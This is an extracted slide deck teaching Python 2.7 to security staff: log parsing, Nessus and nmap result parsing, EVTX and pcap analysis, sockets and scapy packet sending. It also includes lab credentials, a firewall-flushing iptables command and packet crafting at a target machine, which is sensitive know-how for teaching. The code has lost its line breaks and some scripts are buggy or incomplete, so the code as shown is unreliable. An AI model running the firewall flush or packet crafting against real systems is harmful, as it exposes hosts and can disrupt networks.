Post on 14-Jan-2016
1
Python2014
Python For IT Security ProfessionalsBy: Joe McCray
2
Agenda
• Who is This Course For• Why Python• Installing Python• Programming Basics• Python Syntax Basics
3
Who Is This Course For?• If you are an IT Security Professional and the thought of programming
makes you nauseous
• If you’ve tried to learn a programming language and felt like it was too much math or taught you nothing useful for your job
• If you feel like you can’t learn to program from a book
4
Why Python?• Python is considered by many to be one of the easiest languages to learn
• Python runs on pretty much anything (Windows, Linux, Mac, tablets, phones)
• Lots of modules – so it has lots of functionality
5
Python 2 vs. 3• We will be using Python 2.7.x for this course
• Short version of the differences:• https://wiki.python.org/moin/Python2orPython3
• My rational:– Almost all security tools are in 2.x (reference code)– More tutorials cover 2.x (training materials)
6
Let’s Get Started
• No geekenese• Printing• Math• Variables• Modules and Functions
7
No Geekenese• A lot of computer scientists will be familiar with programming concepts such as:
– Turing’s Primitives– Programming Logic– Data Structures and Algorithms– Object Oriented Programming
• If you are like me then none of this stuff makes any sense to you• I don’t understand any of this stuff, and don’t plan on trying• I’m regular working stiff – so that means that I like:
– Alcohol– Sports– Barbaquing– My weekends are no longer consumed with writing code or recompiling my kernel
• We will focus on the job• common security tasks that working infosec professionals need to do on a regular basis
8
Programming is Simple• Skip programming logic – let’s keep this simple
• Code can only do 3 things:– Processing– Decision– Looping
9
Keep It Simple• Processing
– Read– Write– Math
• Decisions– If/Then
• Looping– For– While
10
Installing Python• Windows32-Bit Versionhttp://www.python.org/ftp/python/2.7.5/python-2.7.5.msi
64-Bit Versionhttp://www.python.org/ftp/python/2.7.5/python-2.7.5.amd64.msi
• Linux– Debian/Ubuntu: sudo apt-get install -y python– RHEL/CentOS/Fedora: sudo yum install -y python
11
Choose Run
12
Choose Next
13
Select the Install Location
14
Choose Next
15
Select Yes
16
Let it install
17
Choose Finish
18
Lesson 1: Simple Printing• Printing>>> print "Today we are learning Python.“
• Math>>> 2+2>>> 6-3>>> 18/7
• >>> 18.0/7
• >>> 18.0/7.0
• >>> 18/7
• >>> 9%4
• >>> 8%4
• >>> 8.75%.5
• >>> 6.*7
• >>> 6*6*6
• >>> 6**3
• >>> 5**12
• >>> -5**4
19
Lesson 2: Simple Numbers and Math
• Math Continued>>> 18.0/7>>> 18.0/7.0>>> 18/7>>> 9%4>>> 8%4>>> 8.75%.5
20
Lesson 2: Simple Numbers and Math
• Math Continued>>> 6.*7>>> 6*6*6>>> 6**3>>> 5**12>>> -5**4
21
Lesson 3: Variables
• Variables>>> x=18>>> x+15>>> x**3>>> y=54>>> x+y
22
Lesson 3: Variables
• Variables>>> g=input("Enter number here: ")
43
>>> g+32
>>> g**3
23
Lesson 4: Modules and Functions
• Functions>>> 5**4>>> pow(5,4)>>> abs(-18)>>> abs(5)>>> floor(18.7)
24
Lesson 4: Modules and Functions • Modules>>> import math>>> math.floor(18.7)>>> math.sqrt(81)>>> joe = math.sqrt>>> joe(9)>>> joe=math.floor>>> joe(19.8)
25
Lesson 5: How to Save Programs• Saving Your ProgramRun "IDLE (Python GUI)"
File -> New Window
print "Python for InfoSec"
File -> Save as py4InfoSec.py
Run -> Run Module or Press "F5"
26
Your Task
• Your first task
• Create a file name.py
• x + raw_input("Enter name: ")• print "Hey " + x• raw_input("Press<enter>")
• Run -> Run Module or Press "F5"
27
Lesson 6: Strings • Strings>>> "XSS">>> 'SQLi'>>> "Joe's a python lover">>> 'Joe\'s a python lover'>>> "Joe said \"InfoSec is fun\" to me">>> a = "Joe">>> b = "McCray">>> a, b>>> a+b
28
Lesson 7: More Strings• More Strings>>> num = 10
>>> num + 2
>>> "The number of open ports found on this system is " + num
>>> num = str(18)
>>> "There are " + num + " vulnerabilities found in this environment."
>>> num2 = 46
>>> "As of 08/20/2012, the number of states that enacted the Security Breach Notification Law is " + `num2`
29
Lesson 8: Raw Input• Your second task• Run "IDLE (Python GUI)"
• File -> New Window
• joemccray=input("Enter name: ")• print joemccray
• Run -> Run Module # Will throw an error• or• Press "F5"
• File -> New Window• joemccray=raw_input("Enter name: ")
• Run -> Run Module
• or
• Press "F5"
• NOTE: • Use "input() for integers and expressions, and use raw_input() when you are dealing with strings.
30
Lesson 9: Sequences and Lists • Lists>>> attacks = ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting',
'Remote File Include']
>>> attacks['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File
Include']
>>> attacks[3]'SQL Injection'
>>> attacks[-2]'Cross-Site Scripting'
31
Level 10: If Statement • If StatementRun "IDLE (Python GUI)"
File -> New Windowattack="SQLI"if attack=="SQLI":
print 'The attacker is using SQLI'
Run -> Run Module or Press "F5"
32
Level 10: If Statement • If StatementRun "IDLE (Python GUI)"
File >> New Windowattack="XSS"if attack=="SQLI":
print 'The attacker is using SQLI'
Run -> Run Module or Press "F5"
33
Level 10: If Statement
• Enough fundamentals & syntax• How about some real security stuff• Let’s get started with log analysis
34
Level 10: If Statement
• Intro to log parsing with Python– Start with grep– Learn to read a file– Look for a value in a list– Prompt for user input
35
Lesson 11: Intro to Log Analysis • Log AnalysisLogin to your StrategicSec Ubuntu machine (user: strategicsec pass: strategicsec)
sudo wget https://s3.amazonaws.com/SecureNinja/Python/access_log
cat access_log | grep 141.101.80.188
cat access_log | grep 141.101.80.187
cat access_log | grep 108.162.216.204
cat access_log | grep 173.245.53.160
Google the following terms:- Python read file- Python read line- Python read from file
36
Your Task• Your x task• Use Python to read in a file line by line
## Open the file with read only permitf = open('access_log', "r")
## use readlines to read all lines in the file## The variable "lines" is a list containing all lineslines = f.readlines()
print lines
## close the file after reading the lines.f.close()
37
Your Task• Your x task• Explain to me what is the difference between Python’s readline() and readlines()
Google the following:- python difference between readlines and readline- python readlines and readline
38
Your Task• Your x task• Search for the following IPs in the file and let me know if they are in the file or not:
– 141.101.81.187– 108.162.216.204– 75.19.22.38– 51.78.98.11– 173.245.53.160
Use Python to look for a value in a list
Reference:http://www.wellho.net/mouth/1789_Looking-for-a-value-in-a-list-Python.html
39
Another Task• Your third task• Work together - Use Python to read in a file line by line
• Can you write an if/then statement that looks for this IP and print "Found it"
• 141.101.81.187
40
Another Task• Your third task• Work together - Use Python to read in a file line by line
• Use Python to look for a value in a list
• Reference:• http://www.wellho.net/mouth/1789_Looking-for-a-value-in-a-list-Python.html
41
Another Task• Your third task• Work together - Use Python to read in a file line by line
• Use Python to prompt for user input
• Reference:• http://www.cyberciti.biz/faq/python-raw_input-examples/
42
Another Task• Your third task• Work together - Use Python to read in a file line by line
• Use Python to search for a string in a list
• Reference:• http://stackoverflow.com/questions/4843158/check-if-a-python-list-item-contains-a-string-inside-another-string
43
Lesson 11: Intro to Log Analysis • Log AnalysisIn this lab we will be looking at the scan_log.py script and it will scan the server log to find out common hack
attempts within your web server log.Supported attacks:1. SQL Injection2. Local File Inclusion3. Remote File Inclusion4. Cross-Site Scripting
wget https://s3.amazonaws.com/SecureNinja/Python/scan_log.py
The usage for scan_log.py is simple. You feed it an apache log file.
cat scan_log.py | less (use your up/down arrow keys to look through the file)
Explain to me how this script works.
44
Lesson 12: Use Python to read in a file line by line
Reference:http://cmdlinetips.com/2011/08/three-ways-to-read-a-text-file-line-by-line-in-python/
---------------------------------------------------------vi logread1.py
## Open the file with read only permitf = open('access_log', "r")
## use readlines to read all lines in the file## The variable "lines" is a list containing all lineslines = f.readlines()
print lines
## close the file after reading the lines.f.close()
---------------------------------------------------------
Google the following:- python difference between readlines and readline- python readlines and readline
45
Lesson 13: A quick challengeCan you write an if/then statement that looks for this IP and print "Found it"?
141.101.81.187
---------------------------------------------------------Hint 1: Use Python to look for a value in a list
Reference:http://www.wellho.net/mouth/1789_Looking-for-a-value-in-a-list-Python.html---------------------------------------------------------Hint 2: Use Python to prompt for user input
Reference:http://www.cyberciti.biz/faq/python-raw_input-examples/---------------------------------------------------------Hint 3: Use Python to search for a string in a list
Reference:http://stackoverflow.com/questions/4843158/check-if-a-python-list-item-contains-a-string-inside-another-string
46
Lesson 14: Look for web attacks in a log file
In this lab we will be looking at the scan_log.py script and it will scan the server log to find out common hack attempts within your web server log.Supported attacks:1. SQL Injection2. Local File Inclusion3. Remote File Inclusion4. Cross-Site Scripting
wget https://s3.amazonaws.com/SecureNinja/Python/scan_log.py
The usage for scan_log.py is simple. You feed it an apache log file.
cat scan_log.py | less (use your up/down arrow keys to look through the file)
Explain to me how this script works.
47
Lesson 15: Parsing CSV FilesDealing with csv files
Reference:http://www.pythonforbeginners.com/systems-programming/using-the-csv-module-in-python/
Type the following commands:
wget https://s3.amazonaws.com/SecureNinja/Python/class_nessus.csv
48
Parsing CSV Files (Example 1)#To be able to read csv formated files, we will first have to import the#csv module.
import csvwith open('class_nessus.csv', 'rb') as f: reader = csv.reader(f) for row in reader: print row
49
Parsing CSV Files (Example 2)vi readcsv.py
#!/usr/bin/pythonimport csv # imports the csv moduleimport sys # imports the sys module
f = open(sys.argv[1], 'rb') # opens the csv filetry: reader = csv.reader(f) # creates the reader object for row in reader: # iterates the rows of the file in orders print row # prints each rowfinally: f.close() # closing
50
Parsing CSV Files (Example 3)vi readcsv2.py
#!/usr/bin/python# This program will then read it and displays its contents.import csvifile = open('class_nessus.csv', "rb")reader = csv.reader(ifile)rownum = 0for row in reader: # Save header row. if rownum == 0: header = row else: colnum = 0 for col in row: print '%-8s: %s' % (header[colnum], col) colnum += 1 rownum += 1
ifile.close()
python readcsv2.py | less
51
Your 1st Challengevi readcsv3.py
#!/usr/bin/pythonimport csvf = open('class_nessus.csv', 'rb')try: rownum = 0 reader = csv.reader(f) for row in reader: #Save header row. if rownum == 0: header = row else: colnum = 0 if row[3].lower() == 'high': print '%-1s: %s %-1s: %s %-1s: %s %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6]) rownum += 1finally: f.close()
python readcsv3.py | less
52
Your 2nd Challengevi readcsv4.py
#!/usr/bin/pythonimport csvf = open('class_nessus.csv', 'rb')try: print '/---------------------------------------------------/' rownum = 0 hosts = {} reader = csv.reader(f) for row in reader: # Save header row. if rownum == 0: header = row else: colnum = 0 if row[3].lower() == 'high' and row[4] not in hosts: hosts[row[4]] = row[4] print '%-1s: %s %-1s: %s %-1s: %s %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6]) rownum += 1finally: f.close()
python readcsv4.py | less
53
Parsing XML FilesType the following commands:
wget https://s3.amazonaws.com/SecureNinja/Python/samplescan.xml
wget https://s3.amazonaws.com/SecureNinja/Python/application.xml
wget https://s3.amazonaws.com/SecureNinja/Python/security.xml
wget https://s3.amazonaws.com/SecureNinja/Python/system.xml
wget https://s3.amazonaws.com/SecureNinja/Python/sc_xml.xml
54
Your 1st Challengevi readxml1.py
#!/usr/bin/pythonfrom xmllib import attributesfrom xml.dom.minidom import toxmlfrom xml.dom.minidom import firstChildfrom xml.dom import minidomxmldoc = minidom.parse('sc_xml.xml')grandNode = xmldoc.firstChildnodes = grandNode.getElementsByTagName('host')count = 0
for node in nodes: os = node.getElementsByTagName('os')[0] osclasses = os.getElementsByTagName('osclass') for osclass in osclasses: if osclass.attributes['osfamily'].value == 'Windows' and osclass.attributes['osgen'].value == 'XP': try: print '%-8s: %s -> %-8s: %s' % ('Host',node.getElementsByTagName('hostnames')[0].getElementsByTagName('hostname')[0].attributes['name'].value,'OS',os.getElementsByTagName('osmatch')[0].attributes['name'].value) except: print '%-8s: %s -> %-8s: %s' % ('Host','Unable to find Hostname','OS',os.getElementsByTagName('osmatch')[0].attributes['name'].value)
55
Your 2nd Challengevi readxml2.py
#!/usr/bin/pythonfrom xmllib import attributesfrom xml.dom.minidom import toxmlfrom xml.dom.minidom import firstChildfrom xml.dom import minidomxmldoc = minidom.parse('sc_xml.xml')grandNode = xmldoc.firstChildnodes = grandNode.getElementsByTagName('host')count = 0for node in nodes: portsNode = node.getElementsByTagName('ports')[0] ports = portsNode.getElementsByTagName('port') for port in ports: if port.attributes['portid'].value == '22' and port.attributes['protocol'].value == 'tcp': state = port.getElementsByTagName('state')[0] if state.attributes['state'].value == 'open': try: print '%-8s: %s -> %-8s: %s' % ('Host',node.getElementsByTagName('hostnames')[0].getElementsByTagName('hostname')[0].attributes['name'].value,'Ports','open : tcp : 22') except: print '%-8s: %s -> %-8s: %s' % ('Host','Unable to find Hostname','Ports','open : tcp : 22')
56
Your 3rd Challengevi readxml3.py
#!/usr/bin/pythonfrom xmllib import attributesfrom xml.dom.minidom import toxmlfrom xml.dom.minidom import firstChildfrom xml.dom import minidomxmldoc = minidom.parse('sc_xml.xml')grandNode = xmldoc.firstChildnodes = grandNode.getElementsByTagName('host')count = 0for node in nodes: portsNode = node.getElementsByTagName('ports')[0] ports = portsNode.getElementsByTagName('port') flag = 0 for port in ports: if flag == 0: if port.attributes['protocol'].value == 'tcp' and (port.attributes['portid'].value == '443' or port.attributes['portid'].value == '80'): state = port.getElementsByTagName('state')[0] if state.attributes['state'].value == 'open': try: print '%-8s: %s -> %-8s: %s' % ('Host',node.getElementsByTagName('hostnames')[0].getElementsByTagName('hostname')[0].attributes['name'].value,'Ports','open : tcp : '+port.attributes['portid'].value) except: print '%-8s: %s -> %-8s: %s' % ('Host','Unable to find Hostname','Ports','open : tcp : '+port.attributes['portid'].value) flag = 1
57
Your 4th Challengevi readxml4.py
#!/usr/bin/pythonfrom xmllib import attributesfrom xml.dom.minidom import toxmlfrom xml.dom.minidom import firstChildfrom xml.dom import minidomxmldoc = minidom.parse('sc_xml.xml')grandNode = xmldoc.firstChildnodes = grandNode.getElementsByTagName('host')count = 0for node in nodes: flag = 0 naddress = '' addresses = node.getElementsByTagName('address') for address in addresses: if address.attributes['addrtype'].value == 'ipv4' and address.attributes['addr'].value[0:6] == '10.57.': naddress = address.attributes['addr'].value flag = 1 if flag == 1: portsNode = node.getElementsByTagName('ports')[0]; ports = portsNode.getElementsByTagName('port') flag = 0 for port in ports: status = {}
58
Your 4th Challenge (Continued) if port.attributes['protocol'].value == 'tcp' and port.attributes['portid'].value[0:2] == '22': state = port.getElementsByTagName('state')[0] if "open" in state.attributes['state'].value: status[0] = state.attributes['state'].value status[1] = port.attributes['portid'].value flag = 1 else: flag = 0 if port.attributes['protocol'].value == 'tcp' and flag == 1: if port.attributes['portid'].value == '80' or port.attributes['portid'].value == '443': state = port.getElementsByTagName('state')[0] if state.attributes['state'].value == 'open': flag = 0 try: print '%-8s: %s -> %-8s: %s -> %-8s: %s' % ('Host',node.getElementsByTagName('hostnames')[0].getElementsByTagName('hostname')[0].attributes['name'].value,'IP',naddress,'Ports',status[0]+' : tcp : '+status[1]+' and open : tcp : '+port.attributes['portid'].value) except: print '%-8s: %s -> %-8s: %s -> %-8s: %s' % ('Host','Unable to find Hostname','IP',naddress,'Ports',status[0]+' : tcp : '+status[1]+' and open : tcp : '+port.attributes['portid'].value)
59
Lesson 17: Parsing EVTX Logs Type the following commands:
wget https://s3.amazonaws.com/SecureNinja/Python/Program-Inventory.evtx
wget https://s3.amazonaws.com/SecureNinja/Python/WIN-M751BADISCT_Application.evtx
wget https://s3.amazonaws.com/SecureNinja/Python/WIN-M751BADISCT_Security.evtx
wget https://s3.amazonaws.com/SecureNinja/Python/WIN-M751BADISCT_System.evtx
60
Your 1st Challengevi readevtx1.py
import mmapimport reimport contextlibimport sysimport operatorimport HTMLParserfrom xml.dom import minidomfrom operator import itemgetter, attrgetter
from Evtx.Evtx import FileHeaderfrom Evtx.Views import evtx_file_xml_view
pars = HTMLParser.HTMLParser()print pars.unescape('<Data Name="MaxPasswordAge">&12856;"</Data>')file_name = str(raw_input('Enter EVTX file name without extension : '))file_name = 'WIN-M751BADISCT_System'with open(file_name+'.evtx', 'r') as f: with contextlib.closing(mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ)) as buf: fh = FileHeader(buf, 0x0) xml_file = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\" ?><Events>" try:
61
Your 1st Challenge (Continued) for xml, record in evtx_file_xml_view(fh): xml_file += xml except: pass xml_file += "</Events>"xml_file = re.sub('<NULL>', '<NULL></NULL>', xml_file)xml_file = re.sub('<local>', '<local></local>', xml_file)xml_file = re.sub('&', '&', xml_file)f = open(file_name+'.xml', 'w')f.write(xml_file)f.close()try: xmldoc = minidom.parse(file_name+'.xml')except: sys.exit('Invalid file...')grandNode = xmldoc.firstChildnodes = grandNode.getElementsByTagName('Event')
event_num = int(raw_input('How many events you want to show : '))length = int(len(nodes)) - 1event_id = 0if event_num > length: sys.exit('You have entered an ivalid num...')
62
Your 1st Challenge (Continued)while True: if event_num > 0 and length > -1: try: event_id = nodes[length].getElementsByTagName('EventID')[0].childNodes[0].nodeValue try: print '%-8s: %s - %-8s: %s' % ('Event ID',event_id,'Event',node.getElementsByTagName('string')[1].childNodes[0].nodeValue) except: print '%-8s: %s - %-8s: %s' % ('Event ID',event_id,'Event','Name not found') event_num -= 1 length -= 1 except: length -= 1 else: sys.exit('...Search Complete...')
63
Your 2nd Challengevi readevtx2.py
import mmapimport reimport contextlibimport sysimport operatorimport HTMLParserfrom xml.dom import minidomfrom operator import itemgetter, attrgetter
from Evtx.Evtx import FileHeaderfrom Evtx.Views import evtx_file_xml_view
pars = HTMLParser.HTMLParser()print pars.unescape('<Data Name="MaxPasswordAge">&12856;"</Data>')file_name = str(raw_input('Enter EVTX file name without extension : '))file_name = 'WIN-M751BADISCT_System'with open(file_name+'.evtx', 'r') as f: with contextlib.closing(mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ)) as buf: fh = FileHeader(buf, 0x0) xml_file = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\" ?><Events>"
64
Your 2nd Challenge (Continued)try: xmldoc = minidom.parse(file_name+'.xml')except: sys.exit('Invalid file...')grandNode = xmldoc.firstChildnodes = grandNode.getElementsByTagName('Event')
event = int(raw_input('Enter Event ID : '))event_id = 0for node in nodes: try: event_id = node.getElementsByTagName('EventID')[0].childNodes[0].nodeValue if int(event_id) == event: try: print '%-8s: %s - %-8s: %s' % ('Event ID',event_id,'Event',node.getElementsByTagName('string')[1].childNodes[0].nodeValue) except: print '%-8s: %s - %-8s: %s' % ('Event ID',event_id,'Event','Name not found') except: continuesys.exit('...Search Complete...')
65
Your 3rd Challengevi readevtx3.py
import mmapimport reimport contextlibimport sysimport operatorimport HTMLParserfrom xml.dom import minidomfrom operator import itemgetter, attrgetter
from Evtx.Evtx import FileHeaderfrom Evtx.Views import evtx_file_xml_view
pars = HTMLParser.HTMLParser()print pars.unescape('<Data Name="MaxPasswordAge">&12856;"</Data>')file_name = str(raw_input('Enter EVTX file name without extension : '))file_name = 'WIN-M751BADISCT_System'with open(file_name+'.evtx', 'r') as f: with contextlib.closing(mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ)) as buf: fh = FileHeader(buf, 0x0) xml_file = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\" ?><Events>" try:
66
Your 3rd Challenge (Continued) for xml, record in evtx_file_xml_view(fh): xml_file += xml except: pass xml_file += "</Events>"xml_file = re.sub('<NULL>', '<NULL></NULL>', xml_file)xml_file = re.sub('<local>', '<local></local>', xml_file)xml_file = re.sub('&', '&', xml_file)f = open(file_name+'.xml', 'w')f.write(xml_file)f.close()try: xmldoc = minidom.parse(file_name+'.xml')except: sys.exit('Invalid file...')grandNode = xmldoc.firstChildnodes = grandNode.getElementsByTagName('Event')
event = int(raw_input('Enter Event ID : '))event_id = 0event_count = 0;for node in nodes: try:
67
Your 3rd Challenge (Continued) event_id = node.getElementsByTagName('EventID')[0].childNodes[0].nodeValue if int(event_id) == event: event_count += 1 except: continueprint '%-8s: %s - %-8s: %s' % ('Event ID',event,'Count',event_count)sys.exit('...Search Complete...')
68
Your 4th Challengevi readevtx4.py
import mmapimport reimport contextlibimport sysimport operatorimport HTMLParserfrom xml.dom import minidomfrom operator import itemgetter, attrgetter
from Evtx.Evtx import FileHeaderfrom Evtx.Views import evtx_file_xml_view
pars = HTMLParser.HTMLParser()print pars.unescape('<Data Name="MaxPasswordAge">&12856;"</Data>')file_name = str(raw_input('Enter EVTX file name without extension : '))file_name = 'WIN-M751BADISCT_System'with open(file_name+'.evtx', 'r') as f: with contextlib.closing(mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ)) as buf: fh = FileHeader(buf, 0x0) xml_file = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\" ?><Events>"
69
Your 4th Challenge (Continued) try: for xml, record in evtx_file_xml_view(fh): xml_file += xml except: pass xml_file += "</Events>"xml_file = re.sub('<NULL>', '<NULL></NULL>', xml_file)xml_file = re.sub('<local>', '<local></local>', xml_file)xml_file = re.sub('&', '&', xml_file)f = open(file_name+'.xml', 'w')f.write(xml_file)f.close()try: xmldoc = minidom.parse(file_name+'.xml')except: sys.exit('Invalid file...')grandNode = xmldoc.firstChildnodes = grandNode.getElementsByTagName('Event')
events = []event_id = 0count = 0for node in nodes: try: event_id = node.getElementsByTagName('EventID')[0].childNodes[0].nodeValue
70
Your 4th Challenge (Continued) try: events.append({'event_id' : int(event_id), 'event_name' : node.getElementsByTagName('string')[1].childNodes[0].nodeValue}) except: events.append({'event_id' : int(event_id), 'event_name' : 'Name not found...'}) count += 1 except: continueevents = sorted(events, key=itemgetter('event_id'))for e in events: print esys.exit('...Search Complete...')
71
Lesson 18: Parsing Packets with Python's DPKT
The first thing that you will need to do is install dpkt.
sudo apt-get install -y python-dpkt
Now cd to your courseware directory, and the cd into the subfolder '2-PCAP-Parsing/Resources'. Run tcpdump to capture a .pcap file that we will use for the next exercise
sudo tcpdump -ni eth0 -s0 -w quick.pcap
--open another command prompt--wget http://packetlife.net/media/library/12/tcpdump.pdf
Let's do something simple:
vi quickpcap.py
72
Lesson 18: Parsing Packets with Python's DPKT
--------------------------------------------------------
#!/usr/bin/pythonimport dpkt;
# Simple script to read the timestamps in a pcap file# Reference: http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-0-simple-example-how-to.html
f = open("quick.pcap","rb")pcap = dpkt.pcap.Reader(f)
for ts, buf in pcap:print ts;
f.close();
--------------------------------------------------------
73
Lesson 18: Parsing Packets with Python's DPKT
Now let's run the script we just wrote
python quickpcap.py
How dpkt breaks down a packet:
Reference:http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-1-dpkt-sub-modules.html
src: the MAC address of SOURCE. dst: The MAC address of DESTINATION type: The protocol type of contained ethernet payload.
The allowed values are listed in the file "ethernet.py",such as:a) ETH_TYPE_IP: It means that the ethernet payload is IP layer data.b) ETH_TYPE_IPX: Means that the ethernet payload is IPX layer data.
74
Lesson 18: Parsing Packets with Python's DPKT
References:http://stackoverflow.com/questions/6337878/parsing-pcap-files-with-dpkt-python
Ok - now let's have a look at pcapparsing.py
sudo tcpdump -ni eth0 -s0 -w capture-100.pcap
--open another command prompt--wget http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf
Ok - now let's have a look at pcapparsing.py--------------------------------------------------------
75
Lesson 18: Parsing Packets with Python's DPKT
import socketimport dpktimport sysf = open('capture-100.pcap','r')pcapReader = dpkt.pcap.Reader(f)
for ts,data in pcapReader: ether = dpkt.ethernet.Ethernet(data) if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise ip = ether.data tcp = ip.data src = socket.inet_ntoa(ip.src) srcport = tcp.sport dst = socket.inet_ntoa(ip.dst) dstport = tcp.dport print "src: %s (port : %s)-> dest: %s (port %s)" % (src,srcport ,dst,dstport)
f.close()
--------------------------------------------------------
76
Lesson 18: Parsing Packets with Python's DPKT
OK - let's run it:python pcapparsing.py
running this script might throw an error like this:
Traceback (most recent call last): File "pcapparsing.py", line 9, in <module> if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
If it does it is just because your packet has something in it that we didn't specify (maybe ICMP, or something)
Your homework for today...
Rewrite this pcapparsing.py so that it prints out the timestamp, the source and destination IP addresses, and the source and destination ports.
Your challenge is to fix the Traceback error
77
Lesson 19: Python Sockets & Port Scanning
$ ncat -l -v -p 1234
--open another terminal--python
>>> import socket>>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)>>> s.connect(('localhost', 1234))>>> s.send('Hello, world')>>> data = s.recv(1024)>>> s.close()
>>> print 'Received', 'data'
78
Objective: Dealing with PCAPs
• Parsing packets with Python
79
Agenda
• Intro to PCAP parsing with Python– Start with grep– Learn to read a file– Look for a value in a list– Prompt for user input
80
Review Concepts (PCAP Analysis)• PCAP Analysissudo apt-get install -y python-dpkt
sudo tcpdump -ni eth0 -s0 -w quick.pcap
--open another command prompt--wget http://packetlife.net/media/library/12/tcpdump.pdf
81
Review Concepts (PCAP Analysis)• PCAP AnalysisLet's do something simple:vi quickpcap.py
#!/usr/bin/pythonimport dpkt;
f = open("quick.pcap","rb")pcap = dpkt.pcap.Reader(f)
for ts, buf in pcap:print ts;
f.close();
82
Review Concepts (PCAP Analysis)• PCAP AnalysisNow let's run the script we just wrote
python quickpcap.py
83
Review Concepts (PCAP Analysis)• DPKTHow dpkt breaks down a packet:
src: the MAC address of SOURCE. dst: The MAC address of DESTINATION type: The protocol type of contained ethernet payload.
The allowed values are listed in the file "ethernet.py",such as:a) ETH_TYPE_IP: It means that the ethernet payload is IP layer data.b) ETH_TYPE_IPX: Means that the ethernet payload is IPX layer data.
84
Review Concepts (PCAP Analysis)• DPKTOk - now let's have a look at pcapparsing.py
sudo tcpdump -ni eth0 -s0 -w capture-100.pcap
--open another command prompt--wget http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf
85
Review Concepts (PCAP Analysis)• DPKTOk - now let's have a look at pcapparsing.py
import socketimport dpktimport sysf = open('capture-100.pcap','r')pcapReader = dpkt.pcap.Reader(f)
for ts,data in pcapReader: ether = dpkt.ethernet.Ethernet(data) if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise ip = ether.data tcp = ip.data src = socket.inet_ntoa(ip.src) srcport = tcp.sport dst = socket.inet_ntoa(ip.dst) dstport = tcp.dport print "src: %s (port : %s)-> dest: %s (port %s)" % (src,srcport ,dst,dstport)
f.close()
86
Review Concepts (PCAP Analysis)• DPKTOK - let's run it:python pcapparsing.py
running this script might throw an error like this:
Traceback (most recent call last): File "pcapparsing.py", line 9, in <module> if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
87
Your Task• Your x task• Rewrite this pcapparsing.py so that it prints out the timestamp, the source and destination IP addresses, and the source and
destination ports.
88
Day 2: Sockets, Shells, and Scapy
• Parsing packets with Python
89
Agenda
• Intro to Python sockets, sch and port scanning– Python sockets– Python shells– Writing scripts with scapy
90
Review Concepts (Sockets)• Sockets$ sudo /sbin/iptables -F$ ncat -l -v -p 1234
--open another terminal--python
>>> import socket>>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)>>> s.connect(('localhost', 1234))>>> s.send('Hello, world')>>> data = s.recv(1024)>>> s.close()
>>> print 'Received', 'data'
91
Lesson 20: TCP Client and TCP Server
• TCP Clientvi tcpclient.py
#!/usr/bin/python# tcpclient.py
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)hostport = ("127.0.0.1", 1337)s.connect(hostport)s.send("Hello\n")buf = s.recv(1024)print "Received", buf
92
Lesson 20: TCP Client and TCP Server
• TCP Servervi tcpserver.py
#!/usr/bin/python# tcpserver.py
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)hostport = ("", 1337)s.bind(hostport)s.listen(10)while 1:
cli,addr = s.accept()print "Connection from", addrbuf = cli.recv(1024)print "Received", bufif buf == "Hello\n":
cli.send("Server ID 1\n")cli.close()
93
Lesson 20: TCP Client and TCP Server
• TCP Client-Server Communication-- In one terminal--python tcpserver.py
--open another terminal--python tcpclient.py
94
Review Concepts (UDP Client)• UDP Clientvi udpclient.py
#!/usr/bin/python# udpclient.py
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)hostport = ("127.0.0.1", 1337)s.sendto("Hello\n", hostport)buf = s.recv(1024)print buf
95
Review Concepts (UDP Server)• UDP Servervi udpserver.py
#!/usr/bin/python# udpserver.py
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)hostport = ("127.0.0.1", 1337)s.bind(hostport)while 1:
buf, address = s.recvfrom(1024)print bufif buf == "Hello\n":
s.sendto("Server ID 1\n", address)
96
Review Concepts (Client-Server)• UDP Client-Server Communication-- In one terminal--python udpserver.py
--open another terminal--python udpclient.py
97
Lesson 22: Installing Scapy sudo apt-get update sudo apt-get install python-scapy python-pyx python-gnuplot
Reference Page For All Of The Commands We Will Be Running:http://samsclass.info/124/proj11/proj17-scapy.html
To run Scapy interactively
sudo scapy
98
Lesson 23: Sending ICMPv4 Packets with scapy
In the Linux machine, in the Terminal window, at the >>> prompt, type this command, and then press the Enter key:
i = IP()
This creates an object named i of type IP. To see the properties of that object, use the display() method with this command:
i.display()
Use these commands to set the destination IP address and display the properties of the i object again. Replace the IP address in the first command with the IP address of your target Windows machine:
i.dst="10.65.75.49"
i.display()
.
99
Sending ICMPv4 Packets with Scapy (Continued)
Notice that scapy automatically fills in your machine's source IP address.
Use these commands to create an object named ic of type ICMP and display its properties:
ic = ICMP() ic.display()
Use this command to send the packet onto the network and listen to a single packet in response. Note that the third character is the numeral 1, not a lowercase L:
sr1(i/ic)
This command sends and receives one packet, of type IP at layer 3 and ICMP at layer 4. As you can see in the image above, the response is shown, with ICMP type echo-reply. The Padding section shows the portion of the packet that carries higher-level data. In this case it contains only zeroes as padding.Use this command to send a packet that is IP at layer 3, ICMP at layer 4, and that contains data with your name in it (replace YOUR NAME with your own name): sr1(i/ic/"YOUR NAME")
You should see a reply with a Raw section containing your name
100
